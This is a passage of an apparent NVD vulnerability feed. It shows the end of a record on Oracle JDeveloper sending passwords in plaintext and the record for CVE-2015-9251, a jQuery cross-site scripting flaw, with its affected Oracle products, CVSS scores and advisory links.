authentication: "NONE", availabilityImpact: "PARTIAL", baseScore: 4.6, confidentialityImpact: "PARTIAL", integrityImpact: "PARTIAL", vectorString: "AV:L/AC:L/Au:N/C:P/I:P/A:P", version: "2.0", }, exploitabilityScore: 3.9, impactScore: 6.4, obtainAllPrivilege: false, obtainOtherPrivilege: true, obtainUserPrivilege: false, source: "nvd@nist.gov", type: "Primary", userInteractionRequired: false, }, ], }, published: "2005-07-18T04:00:00.000", references: [ { source: "cve@mitre.org", url: "http://marc.info/?l=bugtraq&m=112129082323341&w=2", }, { source: "cve@mitre.org", tags: [ "Patch", "Vendor Advisory", ], url: "http://www.red-database-security.com/advisory/oracle_jdeveloper_passes_plaintext_password.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "http://marc.info/?l=bugtraq&m=112129082323341&w=2", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Vendor Advisory", ], url: "http://www.red-database-security.com/advisory/oracle_jdeveloper_passes_plaintext_password.html", }, ], sourceIdentifier: "cve@mitre.org", vulnStatus: "Deferred", weaknesses: [ { description: [ { lang: "en", value: "NVD-CWE-Other", }, ], source: "nvd@nist.gov", type: "Primary", }, ], }
Vulnerability from fkie_nvd
Published
2018-01-18 23:29
Modified
2024-11-21 02:40
Severity ?
Summary
jQuery before 3.0.0 is vulnerable to Cross-site Scripting (XSS) attacks when a cross-domain Ajax request is performed without the dataType option, causing text/javascript responses to be executed.
References
Impacted products
{ configurations: [ { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:jquery:jquery:*:*:*:*:*:*:*:*", matchCriteriaId: "9CD7C3A9-7A77-4553-9893-D16D9FDC84AB", versionEndExcluding: "3.0.0", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.0.0:*:*:*:*:*:*:*", matchCriteriaId: "A079FD6E-3BB0-4997-9A8E-6F8FEC89887A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.1.0:*:*:*:*:*:*:*", matchCriteriaId: "900D2344-5160-42A0-8C49-36DBC7FF3D87", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.2.0:*:*:*:*:*:*:*", matchCriteriaId: "A4AA4B21-1BA9-4ED8-B9EA-558AF8655D24", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.3.0:*:*:*:*:*:*:*", matchCriteriaId: "9C3F9EE5-FCFC-45B8-9F57-C05D42EE0FF0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.3.1:*:*:*:*:*:*:*", matchCriteriaId: "E3DF1971-3FD9-4954-AF2D-DDA0B24B89CD", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_platform:2.6.0:*:*:*:*:*:*:*", matchCriteriaId: "8972497F-6E24-45A9-9A18-EB0E842CB1D4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_platform:2.6.1:*:*:*:*:*:*:*", matchCriteriaId: "400509A8-D6F2-432C-A2F1-AD5B8778D0D9", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_platform:2.6.2:*:*:*:*:*:*:*", matchCriteriaId: "132CE62A-FBFC-4001-81EC-35D81F73AF48", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:business_process_management_suite:11.1.1.9.0:*:*:*:*:*:*:*", matchCriteriaId: "013043A2-0765-4AF5-ABFC-6A8960FFBFD2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:business_process_management_suite:12.1.3.0.0:*:*:*:*:*:*:*", matchCriteriaId: "B887E174-57AB-449D-AEE4-82DD1A3E5C84", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:business_process_management_suite:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "E869C417-C0E6-4FC3-B406-45598A1D1906", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_converged_application_server:*:*:*:*:*:*:*:*", matchCriteriaId: "EC361999-AAD8-4CB3-B00E-E3990C3529B4", versionEndExcluding: "7.0.0.1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_interactive_session_recorder:6.0:*:*:*:*:*:*:*", matchCriteriaId: "C510CE66-DD71-45C8-B678-9BD81EC7FFBB", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_interactive_session_recorder:6.1:*:*:*:*:*:*:*", matchCriteriaId: "BF0A211C-7C3D-46AE-B525-890A9194C422", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_interactive_session_recorder:6.2:*:*:*:*:*:*:*", matchCriteriaId: "B1AD7C68-81DF-4332-AEB3-B368E0221F52", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_services_gatekeeper:*:*:*:*:*:*:*:*", matchCriteriaId: "97C1FA4C-5163-420C-A01A-EA36F1039BBB", versionEndExcluding: "6.1.0.4.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_webrtc_session_controller:*:*:*:*:*:*:*:*", matchCriteriaId: "77120A3C-9A48-45FC-A620-5072AF325ACF", versionEndExcluding: "7.2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:endeca_information_discovery_studio:3.1.0:*:*:*:*:*:*:*", matchCriteriaId: "BED45FB9-410F-4FC6-ACEB-49476F1C50BE", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:endeca_information_discovery_studio:3.2.0:*:*:*:*:*:*:*", matchCriteriaId: "9D03A8C9-35A5-4B75-9711-7A4A60457307", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_ops_center:12.2.2:*:*:*:*:*:*:*", matchCriteriaId: "BE12B6A4-E128-41EC-8017-558F50B961BE", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_ops_center:12.3.3:*:*:*:*:*:*:*", matchCriteriaId: "AB654DFA-FEF9-4D00-ADB0-F3F2B6ACF13E", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_operations_monitor:3.4:*:*:*:*:*:*:*", matchCriteriaId: "835BFCBC-848C-4A2C-BDE7-3D94CEC3F5D8", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_operations_monitor:4.0:*:*:*:*:*:*:*", matchCriteriaId: "8A1B7A35-B332-476E-A676-C2CD4D72FA50", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:*:*:*:*:*:*:*:*", matchCriteriaId: "B5BC32AA-78BE-468B-B92A-5A0FFFA970FA", versionEndIncluding: "7.3.5", versionStartIncluding: "7.3.3", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:*:*:*:*:*:*:*:*", matchCriteriaId: "47E1F95E-A3A5-4996-B951-0F946CB11210", versionEndIncluding: "8.0.7", versionStartIncluding: "8.0.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_asset_liability_management:*:*:*:*:*:*:*:*", matchCriteriaId: "703DA91D-3440-4C67-AA20-78F71B1376DD", versionEndIncluding: "8.0.7", versionStartIncluding: "8.0.4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_data_integration_hub:*:*:*:*:*:*:*:*", matchCriteriaId: "73E05211-8415-42FB-9B93-959EB03B090B", versionEndIncluding: "8.0.7", versionStartIncluding: "8.0.5", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_funds_transfer_pricing:*:*:*:*:*:*:*:*", matchCriteriaId: "AC15899F-8528-4D10-8CD5-F67121D7F293", versionEndIncluding: "8.0.7", versionStartIncluding: "8.0.4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_hedge_management_and_ifrs_valuations:*:*:*:*:*:*:*:*", matchCriteriaId: "30657F1B-D1FC-4EE6-9854-18993294A01D", versionEndIncluding: "8.0.7", versionStartIncluding: "8.0.4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_liquidity_risk_management:*:*:*:*:*:*:*:*", matchCriteriaId: "E376C9FB-1870-4B4E-8D69-02A70C0A041C", versionEndIncluding: "8.0.6", versionStartIncluding: "8.0.2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_loan_loss_forecasting_and_provisioning:*:*:*:*:*:*:*:*", matchCriteriaId: "DB6C521C-F104-4E26-82F2-6F63F94108BC", versionEndIncluding: "8.0.7", versionStartIncluding: "8.0.2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_market_risk_measurement_and_management:8.0.5:*:*:*:*:*:*:*", matchCriteriaId: "402B8642-7ACC-4F42-87A9-AB4D3B581751", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_market_risk_measurement_and_management:8.0.6:*:*:*:*:*:*:*", matchCriteriaId: "EF6D5112-4055-4F89-A5B3-0DCB109481B7", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_profitability_management:*:*:*:*:*:*:*:*", matchCriteriaId: "EC3830C0-2B9F-41BD-94C9-E3718467A1AC", versionEndIncluding: "8.0.6", versionStartIncluding: "8.0.4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_reconciliation_framework:8.0.5:*:*:*:*:*:*:*", matchCriteriaId: "6D027285-07C1-4B3A-AB54-4426C16E236A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_reconciliation_framework:8.0.6:*:*:*:*:*:*:*", matchCriteriaId: "3831F35C-DED2-4E40-AA94-1512E106BFF2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:fusion_middleware_mapviewer:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "06E586B3-3434-4B08-8BE3-16C528642CA5", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:healthcare_foundation:7.1:*:*:*:*:*:*:*", matchCriteriaId: "3C36C520-B5F5-45F1-B55F-62859CDA012E", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:healthcare_foundation:7.2:*:*:*:*:*:*:*", matchCriteriaId: "5EAAFF95-000C-4D78-98FF-9EDE9D966A65", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:healthcare_translational_research:3.1.0:*:*:*:*:*:*:*", matchCriteriaId: "A5ACB1D2-69CE-4B7D-9B51-D8F80E541631", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:hospitality_cruise_fleet_management:9.0.11:*:*:*:*:*:*:*", matchCriteriaId: "03C46CCD-B49F-405A-A0A0-E0DFBA60F0D5", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:hospitality_guest_access:4.2.0:*:*:*:*:*:*:*", matchCriteriaId: "1A3DC116-2844-47A1-BEC2-D0675DD97148", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:hospitality_guest_access:4.2.1:*:*:*:*:*:*:*", matchCriteriaId: "E0F1DF3E-0F2D-4EFC-9A3E-F72149C8AE94", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:hospitality_materials_control:18.1:*:*:*:*:*:*:*", matchCriteriaId: "2AC63D10-2326-4542-B345-31D45B9A7408", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:hospitality_reporting_and_analytics:9.1.0:*:*:*:*:*:*:*", matchCriteriaId: "FCBF2756-B831-4E6E-A15B-2A11DD48DB7C", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_insbridge_rating_and_underwriting:5.2:*:*:*:*:*:*:*", matchCriteriaId: "0D76453B-95AF-4AC4-8096-7D117F69B45B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_insbridge_rating_and_underwriting:5.4:*:*:*:*:*:*:*", matchCriteriaId: "EDE3671B-EB36-490A-BA70-575FCA332B94", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_insbridge_rating_and_underwriting:5.5:*:*:*:*:*:*:*", matchCriteriaId: "E03A631E-253A-4C56-9986-97F86C323482", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:9.2:*:*:*:*:*:*:*", matchCriteriaId: "41684398-18A4-4DC6-B8A2-3EBAA0CBF9A6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:11.1.1.9.0:*:*:*:*:*:*:*", matchCriteriaId: "A7506589-9B3B-49BA-B826-774BFDCC45B8", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.1.3.0.0:*:*:*:*:*:*:*", matchCriteriaId: "042C243F-EDFE-4A04-AB0B-26E73CC34837", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "228DA523-4D6D-48C5-BDB0-DB1A60F23F8B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:oss_support_tools:19.1:*:*:*:*:*:*:*", matchCriteriaId: "0A81D092-FC04-4B7D-83FB-58D402B5EF9A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.55:*:*:*:*:*:*:*", matchCriteriaId: "45CB30A1-B2C9-4BF5-B510-1F2F18B60C64", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.56:*:*:*:*:*:*:*", matchCriteriaId: "D0A735B4-4F3C-416B-8C08-9CB21BAD2889", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.57:*:*:*:*:*:*:*", matchCriteriaId: "7E1E416B-920B-49A0-9523-382898C2979D", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_gateway:15.2:*:*:*:*:*:*:*", matchCriteriaId: "6CBFA960-D242-43ED-8D4C-A60F01B70740", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_gateway:16.2:*:*:*:*:*:*:*", matchCriteriaId: "0513B305-97EF-4609-A82E-D0CDFF9925BA", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_gateway:17.12:*:*:*:*:*:*:*", matchCriteriaId: "61A7F6E0-A4A4-4FC3-90CB-156933CB3B9A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_unifier:*:*:*:*:*:*:*:*", matchCriteriaId: "B8249A74-C34A-4F66-8F11-F7F50F8813BF", versionEndIncluding: "17.12", versionStartIncluding: "17.1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_unifier:16.1:*:*:*:*:*:*:*", matchCriteriaId: "D55A54FD-7DD1-49CD-BE81-0BE73990943C", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_unifier:16.2:*:*:*:*:*:*:*", matchCriteriaId: "82EB08C0-2D46-4635-88DF-E54F6452D3A3", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_unifier:18.8:*:*:*:*:*:*:*", matchCriteriaId: "202AD518-2E9B-4062-B063-9858AE1F9CE2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:real-time_scheduler:2.3.0:*:*:*:*:*:*:*", matchCriteriaId: "A108B4EF-768F-4118-86B5-C0D9CDDE6A6C", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_allocation:15.0.2:*:*:*:*:*:*:*", matchCriteriaId: "686D4323-4B05-4B92-B598-594A31F937C3", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_customer_insights:15.0:*:*:*:*:*:*:*", matchCriteriaId: "AD4AB77A-E829-4603-AF6A-97B9CD0D687F", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_customer_insights:16.0:*:*:*:*:*:*:*", matchCriteriaId: "6DE15D64-6F49-4F43-8079-0C7827384C86", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_invoice_matching:15.0:*:*:*:*:*:*:*", matchCriteriaId: "788F2530-F011-4489-8029-B3468BAF7787", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_sales_audit:15.0:*:*:*:*:*:*:*", matchCriteriaId: "68B5147A-F6A3-499E-815D-6DAABDA33B03", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_workforce_management_software:1.60.9:*:*:*:*:*:*:*", matchCriteriaId: "26C5CF80-8CFF-44D9-B3ED-C259847E9C46", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_workforce_management_software:1.64.0:*:*:*:*:*:*:*", matchCriteriaId: "569644AC-69AD-412D-B399-4052D4DB2928", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:service_bus:12.1.3.0.0:*:*:*:*:*:*:*", matchCriteriaId: "70BEF219-45EC-4A53-A815-42FBE20FC300", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:service_bus:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "1EA2023A-1AD6-41FE-A214-9D1F6021D6B6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:siebel_ui_framework:18.10:*:*:*:*:*:*:*", matchCriteriaId: "3FFFBA49-F340-4A3D-BE8C-73213A669855", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:siebel_ui_framework:18.11:*:*:*:*:*:*:*", matchCriteriaId: "B491FB70-B6FC-4063-BE00-CAD664B39055", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:utilities_framework:*:*:*:*:*:*:*:*", matchCriteriaId: "70E13C38-9FC3-46BD-B9A4-1033C98C19D3", versionEndIncluding: "4.3.0.4", versionStartIncluding: "4.3.0.1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:utilities_mobile_workforce_management:2.3.0:*:*:*:*:*:*:*", matchCriteriaId: "AE1E1CA5-D443-4C5D-8F43-550106FFE3DE", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:webcenter_sites:11.1.1.8.0:*:*:*:*:*:*:*", matchCriteriaId: "1BB4709C-6373-43CC-918C-876A6569865A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:weblogic_server:12.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "F745235C-55A9-4353-A4CB-4B7834BDD63F", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:weblogic_server:12.2.1.3:*:*:*:*:*:*:*", matchCriteriaId: "CBFF04EF-B1C3-4601-878A-35EA6A15EF0C", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, ], cveTags: [], descriptions: [ { lang: "en", value: "jQuery before 3.0.0 is vulnerable to Cross-site Scripting (XSS) attacks when a cross-domain Ajax request is performed without the dataType option, causing text/javascript responses to be executed.", }, { lang: "es", value: "jQuery en versiones anteriores a la 3.0.0 es vulnerable a ataques de Cross-site Scripting (XSS) cuando se realiza una petición Ajax de dominios cruzados sin la opción dataType. Esto provoca que se ejecuten respuestas de texto/javascript.", }, ], id: "CVE-2015-9251", lastModified: "2024-11-21T02:40:09.093", metrics: { cvssMetricV2: [ { acInsufInfo: false, baseSeverity: "MEDIUM", cvssData: { accessComplexity: "MEDIUM", accessVector: "NETWORK", authentication: "NONE", availabilityImpact: "NONE", baseScore: 4.3, confidentialityImpact: "NONE", integrityImpact: "PARTIAL", vectorString: "AV:N/AC:M/Au:N/C:N/I:P/A:N", version: "2.0", }, exploitabilityScore: 8.6, impactScore: 2.9, obtainAllPrivilege: false, obtainOtherPrivilege: false, obtainUserPrivilege: false, source: "nvd@nist.gov", type: "Primary", userInteractionRequired: true, }, ], cvssMetricV30: [ { cvssData: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 6.1, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "CHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", version: "3.0", }, exploitabilityScore: 2.8, impactScore: 2.7, source: "nvd@nist.gov", type: "Primary", }, ], }, published: "2018-01-18T23:29:00.307", references: [ { source: "cve@mitre.org", url: "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00041.html", }, { source: "cve@mitre.org", url: "http://packetstormsecurity.com/files/152787/dotCMS-5.1.1-Vulnerable-Dependencies.html", }, { source: "cve@mitre.org", url: "http://packetstormsecurity.com/files/153237/RetireJS-CORS-Issue-Script-Execution.html", }, { source: "cve@mitre.org", url: "http://packetstormsecurity.com/files/156743/OctoberCMS-Insecure-Dependencies.html", }, { source: "cve@mitre.org", url: "http://seclists.org/fulldisclosure/2019/May/10", }, { source: "cve@mitre.org", url: "http://seclists.org/fulldisclosure/2019/May/11", }, { source: "cve@mitre.org", url: "http://seclists.org/fulldisclosure/2019/May/13", }, { source: "cve@mitre.org", tags: [ "Patch", ], url: "http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", "VDB Entry", ], url: "http://www.securityfocus.com/bid/105658", }, { source: "cve@mitre.org", url: "https://access.redhat.com/errata/RHSA-2020:0481", }, { source: "cve@mitre.org", url: "https://access.redhat.com/errata/RHSA-2020:0729", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/jquery/jquery/commit/f60729f3903d17917dc351f3ac87794de379b0cc", }, { source: "cve@mitre.org", tags: [ "Issue Tracking", "Patch", "Third Party Advisory", ], url: "https://github.com/jquery/jquery/issues/2432", }, { source: "cve@mitre.org", tags: [ "Issue Tracking", "Patch", "Third Party Advisory", ], url: "https://github.com/jquery/jquery/pull/2588", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/jquery/jquery/pull/2588/commits/c254d308a7d3f1eac4d0b42837804cfffcba4bb2", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", "US Government Resource", ], url: "https://ics-cert.us-cert.gov/advisories/ICSA-18-212-04", }, { source: "cve@mitre.org", url: "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44601", }, { source: "cve@mitre.org", url: "https://lists.apache.org/thread.html/10f0f3aefd51444d1198c65f44ffdf2d78ca3359423dbc1c168c9731%40%3Cdev.flink.apache.org%3E", }, { source: "cve@mitre.org", url: "https://lists.apache.org/thread.html/17ff53f7999e74fbe3cc0ceb4e1c3b00b180b7c5afec8e978837bc49%40%3Cuser.flink.apache.org%3E", }, { source: "cve@mitre.org", url: "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E", }, { source: "cve@mitre.org", url: "https://lists.apache.org/thread.html/52bafac05ad174000ea465fe275fd3cc7bd5c25535a7631c0bc9bfb2%40%3Cuser.flink.apache.org%3E", }, { source: "cve@mitre.org", url: "https://lists.apache.org/thread.html/54df3aeb4239b64b50b356f0ca6f986e3c4ca5b84c515dce077c7854%40%3Cuser.flink.apache.org%3E", }, { source: "cve@mitre.org", url: "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E", }, { source: "cve@mitre.org", url: "https://lists.apache.org/thread.html/ba79cf1658741e9f146e4c59b50aee56656ea95d841d358d006c18b6%40%3Ccommits.roller.apache.org%3E", }, { source: "cve@mitre.org", url: "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E", }, { source: "cve@mitre.org", url: "https://seclists.org/bugtraq/2019/May/18", }, { source: "cve@mitre.org", url: "https://security.netapp.com/advisory/ntap-20210108-0004/", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://snyk.io/vuln/npm:jquery:20150627", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://sw.aveva.com/hubfs/assets-2018/pdf/security-bulletin/SecurityBulletin_LFSec126.pdf", }, { source: "cve@mitre.org", url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { source: "cve@mitre.org", url: "https://www.oracle.com/security-alerts/cpujan2020.html", }, { source: "cve@mitre.org", url: "https://www.oracle.com/security-alerts/cpujul2020.html", }, { source: "cve@mitre.org", url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { source: "cve@mitre.org", tags: [ "Patch", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", }, { source: "cve@mitre.org", tags: [ "Patch", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", }, { source: "cve@mitre.org", url: "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", }, { source: "cve@mitre.org", url: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { source: "cve@mitre.org", url: "https://www.tenable.com/security/tns-2019-08", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00041.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "http://packetstormsecurity.com/files/152787/dotCMS-5.1.1-Vulnerable-Dependencies.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "http://packetstormsecurity.com/files/153237/RetireJS-CORS-Issue-Script-Execution.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "http://packetstormsecurity.com/files/156743/OctoberCMS-Insecure-Dependencies.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "http://seclists.org/fulldisclosure/2019/May/10", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "http://seclists.org/fulldisclosure/2019/May/11", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "http://seclists.org/fulldisclosure/2019/May/13", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", ], url: "http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", "VDB Entry", ], url: "http://www.securityfocus.com/bid/105658", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://access.redhat.com/errata/RHSA-2020:0481", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://access.redhat.com/errata/RHSA-2020:0729", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/jquery/jquery/commit/f60729f3903d17917dc351f3ac87794de379b0cc", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Issue Tracking", "Patch", "Third Party Advisory", ], url: "https://github.com/jquery/jquery/issues/2432", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Issue Tracking", "Patch", "Third Party Advisory", ], url: "https://github.com/jquery/jquery/pull/2588", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/jquery/jquery/pull/2588/commits/c254d308a7d3f1eac4d0b42837804cfffcba4bb2", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", "US Government Resource", ], url: "https://ics-cert.us-cert.gov/advisories/ICSA-18-212-04", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44601", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/10f0f3aefd51444d1198c65f44ffdf2d78ca3359423dbc1c168c9731%40%3Cdev.flink.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/17ff53f7999e74fbe3cc0ceb4e1c3b00b180b7c5afec8e978837bc49%40%3Cuser.flink.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/52bafac05ad174000ea465fe275fd3cc7bd5c25535a7631c0bc9bfb2%40%3Cuser.flink.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/54df3aeb4239b64b50b356f0ca6f986e3c4ca5b84c515dce077c7854%40%3Cuser.flink.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/ba79cf1658741e9f146e4c59b50aee56656ea95d841d358d006c18b6%40%3Ccommits.roller.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://seclists.org/bugtraq/2019/May/18", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://security.netapp.com/advisory/ntap-20210108-0004/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://snyk.io/vuln/npm:jquery:20150627", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://sw.aveva.com/hubfs/assets-2018/pdf/security-bulletin/SecurityBulletin_LFSec126.pdf", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://www.oracle.com/security-alerts/cpujan2020.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://www.oracle.com/security-alerts/cpujul2020.html", }, { source: 